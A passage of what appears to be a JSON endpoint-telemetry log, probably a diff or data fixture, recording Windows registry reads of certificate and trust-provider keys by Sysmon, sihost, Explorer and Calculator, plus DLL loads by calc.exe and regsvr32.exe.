"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.AppDefaults.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\SysWOW64\\uxtheme.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573244020000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", - "registry_value": "PreferredLaunchWindowingMode", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": 